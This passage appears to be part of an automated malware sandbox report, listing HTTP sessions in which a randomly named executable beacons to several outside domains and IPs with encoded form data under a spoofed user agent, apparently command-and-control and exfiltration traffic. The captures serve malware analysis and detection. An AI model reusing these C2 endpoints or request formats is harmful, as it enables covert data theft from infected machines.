                                              Data Raw: 70 74 48 38 41 36 3d 31 7a 6a 61 54 50 7a 76 77 45 72 51 39 41 5a 70 69 4a 54 6c 7a 6a 35 63 73 55 63 62 68 6b 6f 4a 4e 6a 48 77 67 68 52 65 4f 36 75 78 41 61 4f 34 5a 65 38 62 61 52 77 67 43 56 6d 4c 65 6a 4a 61 63 2f 69 5a 2f 45 57 67 4b 50 59 70 34 6f 38 70 6e 34 43 54 69 2f 75 67 65 69 62 74 61 46 56 5a 56 48 37 6a 52 48 78 37 42 59 46 78 6e 50 35 58 4d 6a 64 48 30 67 4e 70 6d 74 6f 4c 4b 2b 63 67 73 42 65 58 47 48 42 34 31 55 79 50 4f 72 72 56 67 63 62 36 57 45 61 52 56 70 6c 72 46 4d 53 67 68 69 49 5a 7a 75 73 79 58 37 64 64 6c 52 52 55 78 2b 48 67 35 35 54 74 69 56 67 4e 36 44 47 59 58 38 33 6a 6d 52 6d 73 65 55 74 55 5a 57 44 2b 43 32 62 52 39 4a 35 74 31 30 38 41 6a 51 55 50 4e 73 66 33 73 4f 4b 4c 44 35 6f 6d 73 42 35 56 67 38 30 35 6e 65 61 52 61 4d 37 77 6e 55 56 32 33 56 35 41 2f 69 4c 37 70 46 44 74 4b 38 53 6e 49 73 63 42 71 45 50 65 65 35 75 43 68 46 6a 33 57 38 33 46 5a 71 45 2b 59 65 45 4d 37 4e 6b 76 75 6a 38 73 66 46 78 36 39 66 47 34 5a 6c 67 55 4b 52 6e 42 41 72 68 2b 5a 32 69 [TRUNCATED]
                                              Data Ascii: ptH8A6=1zjaTPzvwErQ9AZpiJTlzj5csUcbhkoJNjHwghReO6uxAaO4Ze8baRwgCVmLejJac/iZ/EWgKPYp4o8pn4CTi/ugeibtaFVZVH7jRHx7BYFxnP5XMjdH0gNpmtoLK+cgsBeXGHB41UyPOrrVgcb6WEaRVplrFMSghiIZzusyX7ddlRRUx+Hg55TtiVgN6DGYX83jmRmseUtUZWD+C2bR9J5t108AjQUPNsf3sOKLD5omsB5Vg805neaRaM7wnUV23V5A/iL7pFDtK8SnIscBqEPee5uChFj3W83FZqE+YeEM7Nkvuj8sfFx69fG4ZlgUKRnBArh+Z2ijfhUh1uJJrHOAamu6egmErHHBPzHMNRIp20OEHcsqVPMLsXTasd0oaU+0uyGXmk7PUI1Qpg+D9upLg4rzS1Jkj7aBjXB32KIOshHg/7tIA7o4deWKR2ho2Vh7E5j6r8DLfuSdhd/xCJpvjy5zJaqS72G8T6DXiIh4Xkh2l1nbhZ2cwJo6fqt1e7YpLa48MVYLl3U7+rZqCMg86QFhTJgB7RzwrfI64Ws8Mk83/pz8BbJqkHJiamW1xkvKAyFARzNY6AHHC+K3IUNjvNb4yWze+C5geeRk5Lz5UyaetY+oQYtgeI0Cu8v9Yi+/LXS+541d2vA1pgI1QTXx2kDsZk3aprshMeJGX1xm/aHbLUjj776tfw9YIAjtGgyfVfDsJCF8p2Jdj9ibRhLLklKCUdfZKf0MxJnnZQWcMivLUdJb1ZSGB8zceb1n46GXYcLQY+5ceeTYcCKEFDfmosOcWQN9lv/PS/nrdy/ZO/bz9Mvc76YHgIuz2cJNNupCC2j3OivLBHAKB+Tx7m/FwLX/ilaWLoRERZZqpVwLKU+HsehLsP6S1lMnRvQO8aaLSDF92jqz2BdxUq43ndHpWXLTZVycDclB61cmdhW91mKaKB49+5/jvlQvZkQrBCTrTeOSPR3ULM9NwZshndf72FuX43vMUoGqJIX6oPJUi [TRUNCATED]
                                              Jan 13, 2025 15:12:49.063261032 CET312INHTTP/1.1 404 Not Found
                                              Content-Length: 148
                                              Content-Type: text/html
                                              Date: Mon, 13 Jan 2025 14:12:48 GMT
                                              Etag: "6743f11f-94"
                                              Server: nginx
                                              Connection: close
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              12192.168.2.749983134.122.135.4880524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:50.674694061 CET490OUTGET /a59t/?ptH8A6=4xL6Q7DrxWj99jxZ5aXf1AQ9gWZB5E5jNwylhh0vBKzMCs+5V4gzFQ4JFVb3bklsevH6tDeLKuQQ/YMUh7acgPqUeDekfARjRUucHmZ6H68xhcA6aT153Xsmr+pfOOQ7uAfOZkFusVC3&e4M=Tfa0_jE0 HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.44756.pizza
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 13, 2025 15:12:51.672843933 CET312INHTTP/1.1 404 Not Found
                                              Content-Length: 148
                                              Content-Type: text/html
                                              Date: Mon, 13 Jan 2025 14:12:51 GMT
                                              Etag: "6743f11f-94"
                                              Server: nginx
                                              Connection: close
                                              Data Raw: 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 20 20 20 20 20 20 20 20
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              13192.168.2.749984199.192.21.16980524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:56.725663900 CET757OUTPOST /bowc/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.lonfor.website
                                              Origin: http://www.lonfor.website
                                              Cache-Control: max-age=0
                                              Content-Length: 219
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.lonfor.website/bowc/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 70 74 48 38 41 36 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 32 52 33 7a 4d 6c 6e 6a 59 46 6c 72 4e 75 54 7a 59 4d 4b 68 71 66 4e 4a 46 46 6b 31 4c 56 54 47 68 48 6c 55 68 56 59 35 77 31 41 51 65 59 78 38 35 57 4f 49 78 4d 4e 43 4e 64 6f 36 35 61 59 6d 52 6f 47 6a 73 44 6d 38 4d 56 30 63 63 58 43 5a 4e 4d 65 77 2f 41 58 4d 4e 53 78 42 66 67 61 74 50 34 75 50 54 59 47 7a 38 49 6e 69 4c 41 70 48 31 4d 6f 68 73 58 61 49 68 42 61 4b 4a 46 59 2f 6c 59 4f 36 4c 65 62 44 78 77 34 7a 30 6d 45 48 69 73 41 4f 72 6d 44 58 33 37 68 51 43 64 42 61 66 44 6d 31 54 37 50 71 4b 66 6c 75 55 68 57 43 41 62 33 48 6e 74 53 46 73 59 6b 6c 44 57 54 44 72 4a 34 4a 51 3d 3d
                                              Data Ascii: ptH8A6=sQtSC1b/Ma16y2R3zMlnjYFlrNuTzYMKhqfNJFFk1LVTGhHlUhVY5w1AQeYx85WOIxMNCNdo65aYmRoGjsDm8MV0ccXCZNMew/AXMNSxBfgatP4uPTYGz8IniLApH1MohsXaIhBaKJFY/lYO6LebDxw4z0mEHisAOrmDX37hQCdBafDm1T7PqKfluUhWCAb3HntSFsYklDWTDrJ4JQ==
                                              Jan 13, 2025 15:12:57.418040037 CET918INHTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:12:57 GMT
                                              Server: Apache
                                              Content-Length: 774
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              14192.168.2.749985199.192.21.16980524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:12:59.279766083 CET777OUTPOST /bowc/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.lonfor.website
                                              Origin: http://www.lonfor.website
                                              Cache-Control: max-age=0
                                              Content-Length: 239
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.lonfor.website/bowc/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 70 74 48 38 41 36 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 78 54 48 41 33 6c 56 6c 68 59 30 51 31 41 46 75 59 77 2f 4a 57 2f 49 78 41 46 43 4d 68 6f 36 39 79 59 6d 51 59 47 69 62 2f 6c 39 63 56 79 4a 4d 58 41 58 74 4d 65 77 2f 41 58 4d 4a 44 35 42 66 34 61 74 2b 49 75 4f 78 38 4a 74 73 49 6b 6c 4c 41 70 57 6c 4d 73 68 73 58 34 49 6b 5a 67 4b 4d 42 59 2f 6e 41 4f 36 5a 32 61 4a 78 77 69 39 55 6e 6f 42 69 34 45 41 4b 61 50 58 42 72 48 49 79 4e 78 62 70 43 45 76 78 33 6a 30 62 6e 65 71 57 46 67 56 6d 47 43 46 6d 70 4b 49 4f 73 46 36 30 7a 35 4f 35 6f 38 66 74 6d 68 52 58 35 62 52 4c 38 49 78 73 6f 6f 53 75 75 74 48 35 6f 3d
                                              Data Ascii: ptH8A6=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10ppxTHA3lVlhY0Q1AFuYw/JW/IxAFCMho69yYmQYGib/l9cVyJMXAXtMew/AXMJD5Bf4at+IuOx8JtsIklLApWlMshsX4IkZgKMBY/nAO6Z2aJxwi9UnoBi4EAKaPXBrHIyNxbpCEvx3j0bneqWFgVmGCFmpKIOsF60z5O5o8ftmhRX5bRL8IxsooSuutH5o=
                                              Jan 13, 2025 15:12:59.874948978 CET918INHTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:12:59 GMT
                                              Server: Apache
                                              Content-Length: 774
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              15192.168.2.749986199.192.21.16980524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:13:01.824652910 CET1790OUTPOST /bowc/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.lonfor.website
                                              Origin: http://www.lonfor.website
                                              Cache-Control: max-age=0
                                              Content-Length: 1251
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.lonfor.website/bowc/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 70 74 48 38 41 36 3d 73 51 74 53 43 31 62 2f 4d 61 31 36 79 56 4a 33 79 74 6c 6e 71 59 46 6d 31 39 75 54 6d 49 4e 69 68 72 6a 4e 4a 42 31 30 70 70 35 54 47 79 50 6c 56 43 39 59 31 51 31 41 5a 2b 59 31 2f 4a 57 69 49 31 73 42 43 4d 74 53 36 37 32 59 33 43 67 47 6c 71 2f 6c 6b 73 56 79 52 38 58 46 5a 4e 4d 78 77 2b 73 4c 4d 4e 6e 35 42 66 34 61 74 38 51 75 4e 6a 59 4a 76 73 49 6e 69 4c 41 62 48 31 4d 55 68 73 76 43 49 6b 74 77 4b 59 31 59 2f 48 51 4f 35 71 65 61 54 78 77 6b 36 55 6e 77 42 69 6c 61 41 4b 58 38 58 42 33 39 49 30 39 78 62 76 54 77 78 68 37 30 68 4b 33 77 75 6d 52 2f 5a 57 61 4f 4c 56 56 47 47 4d 78 71 79 46 37 73 41 49 49 64 62 62 4f 69 46 45 55 76 5a 66 77 77 31 61 38 68 4b 4c 71 75 62 50 63 6c 4d 53 4e 6e 6c 63 34 56 41 53 6d 69 50 31 31 55 79 6d 57 54 35 33 69 66 6e 6d 61 6b 44 4c 48 44 49 41 4f 46 46 72 46 6e 67 56 6f 37 57 32 79 58 35 62 47 56 38 4a 66 75 34 4e 58 44 51 42 59 36 76 31 75 39 36 64 66 49 74 6d 6d 53 76 35 65 6e 70 79 70 71 70 76 46 62 5a 67 7a 66 67 31 77 56 47 71 4b [TRUNCATED]
                                              Data Ascii: ptH8A6=sQtSC1b/Ma16yVJ3ytlnqYFm19uTmINihrjNJB10pp5TGyPlVC9Y1Q1AZ+Y1/JWiI1sBCMtS672Y3CgGlq/lksVyR8XFZNMxw+sLMNn5Bf4at8QuNjYJvsIniLAbH1MUhsvCIktwKY1Y/HQO5qeaTxwk6UnwBilaAKX8XB39I09xbvTwxh70hK3wumR/ZWaOLVVGGMxqyF7sAIIdbbOiFEUvZfww1a8hKLqubPclMSNnlc4VASmiP11UymWT53ifnmakDLHDIAOFFrFngVo7W2yX5bGV8Jfu4NXDQBY6v1u96dfItmmSv5enpypqpvFbZgzfg1wVGqKb6Sra2m+ZN32gee3+Y2TppFTzVlzAr+8NnWAqSvbP8fknesUU06wp2SuKmGg4LcoTgmTbFjEHM8OQTHmSX09hFtz2VAdTmKiQtU29okHanq5/t18Y6pPJHZqzV4NiQEmY1uGIZ10P+cQdTIgpw2IGcS2BsEr1beyODtaS7hR5zJVfEDDxV550pR1TxSh+Uu/uyEtegdhEQJzOp/yymdTxIw9c5/jyARaBFnEL2yfL87qAXsa8AoAN74aIHSIJDCaZ//mWIt+j8poQz0kDT+HYquOW8aEqzSX4+aTt/aqII82FDA8xGezJjDFB2hEoDqlUCZi1CwN30eEriMrELrY8zLB8f8E+zxpoZEX/jq4La3AwpBV+8nJOqZfJGg4eZ05oGEAGMilu+ejkzzcwFCD3l+PfgheUgygkFnK+OfKhQmVqE2z4x0Tlt0+UP4imizNB6ZhMsZ7lppoKZkthii7EvOYt3ZxPbYMw2TXqy/HsBRM6xTCXIyQoB8rq2PzkdtT5AHjDXTtJXQJhdhMhKhUdeHJhTDD8zilNcItA0X/Ogx0oq1qDYAZ9AeU4dEyTzee6OtVOZJUtPbDMUUgci89zh+BbgCdW1q8i2glEwAJKcl366nLLP9Rah+04Vx4prabgqSGa7WFtCEElckcPZVD5kRCvgcBZVWCjn [TRUNCATED]
                                              Jan 13, 2025 15:13:02.589643002 CET918INHTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:13:02 GMT
                                              Server: Apache
                                              Content-Length: 774
                                              Connection: close
                                              Content-Type: text/html
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              16192.168.2.749987199.192.21.16980524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:13:04.362180948 CET493OUTGET /bowc/?e4M=Tfa0_jE0&ptH8A6=hSFyBF7QNpd6wUo32OUgsrg4/MrOyIQWjK6IJxkbiJgyDGKURjVOywd5a/1i9fugKQVYW71g1Iqe5QUBl7nOwfh9UMCmV9sv26tPWfSpL+RY4eJUJjwe/OEwjvV/FXoNhKuiWFV4ToBJ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Host: www.lonfor.website
                                              Connection: close
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Jan 13, 2025 15:13:04.983576059 CET933INHTTP/1.1 404 Not Found
                                              Date: Mon, 13 Jan 2025 14:13:04 GMT
                                              Server: Apache
                                              Content-Length: 774
                                              Connection: close
                                              Content-Type: text/html; charset=utf-8
                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 [TRUNCATED]
                                              Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><title>404 Not Found</title><link href="https://fonts.googleapis.com/css?family=Roboto:400,700" rel="stylesheet"><link type="text/css" rel="stylesheet" href="/css/style404.css" /></head><body><div id="notfound"><div class="notfound"><div class="notfound-404"><h1>4<span>0</span>4</h1></div><h2>the page you requested could not found</h2><form class="notfound-search"><input type="text" placeholder="Search..."><button type="button"><span></span></button></form></div></div></body></html>


                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                              17192.168.2.749988154.197.162.23980524C:\Program Files (x86)\KjNfWTQXSIwRibblqzldBdzoFhOPznecnMAPCsuTNMWBkTJhvOhCHzXYXJxnrNaMkW\mSWyWMUGFWJCYT.exe
                                              TimestampBytes transferredDirectionData
                                              Jan 13, 2025 15:13:10.939888954 CET763OUTPOST /cf9p/ HTTP/1.1
                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                              Accept-Language: en-US
                                              Accept-Encoding: gzip, deflate
                                              Host: www.investshares.net
                                              Origin: http://www.investshares.net
                                              Cache-Control: max-age=0
                                              Content-Length: 219
                                              Connection: close
                                              Content-Type: application/x-www-form-urlencoded
                                              Referer: http://www.investshares.net/cf9p/
                                              User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) FoxyWhore Safari/538.1
                                              Data Raw: 70 74 48 38 41 36 3d 67 6d 50 50 4f 47 54 36 70 67 71 6a 6c 48 6e 6c 4e 62 61 71 65 77 6a 78 50 63 30 4f 79 57 33 70 43 6f 68 32 4e 59 6a 70 61 65 4f 69 38 61 79 55 6f 4e 36 69 43 71 32 7a 75 6e 70 76 74 38 4c 41 44 65 74 74 48 37 73 77 65 62 78 51 62 75 55 59 46 65 2f 62 42 4a 2f 58 67 4d 44 66 64 4c 73 67 42 66 4c 32 39 43 52 30 30 77 78 79 41 39 42 7a 43 4f 42 67 57 52 71 70 54 7a 65 48 75 68 31 51 38 39 72 6b 65 59 7a 45 4a 4c 43 6c 65 42 71 69 35 38 36 68 35 6f 34 75 47 37 31 4c 52 61 4b 49 49 44 4e 41 63 6c 5a 69 35 74 31 61 77 78 69 35 59 33 55 65 63 61 65 54 79 74 71 7a 57 75 37 54 56 62 57 64 51 4a 6b 50 56 48 4d 5a 34 2f 31 2f 70 51 3d 3d
                                              Data Ascii: ptH8A6=gmPPOGT6pgqjlHnlNbaqewjxPc0OyW3pCoh2NYjpaeOi8ayUoN6iCq2zunpvt8LADettH7swebxQbuUYFe/bBJ/XgMDfdLsgBfL29CR00wxyA9BzCOBgWRqpTzeHuh1Q89rkeYzEJLCleBqi586h5o4uG71LRaKIIDNAclZi5t1awxi5Y3UecaeTytqzWu7TVbWdQJkPVHMZ4/1/pQ==
                                              Jan 13, 2025 15:13:11.105389118 CET309INHTTP/1.1 403 Forbidden
                                              Server: nginx
                                              Date: Sun, 12 Jan 2025 22:12:35 GMT
                                              Content-Type: text/html
                                              Content-Length: 166
                                              Connection: close
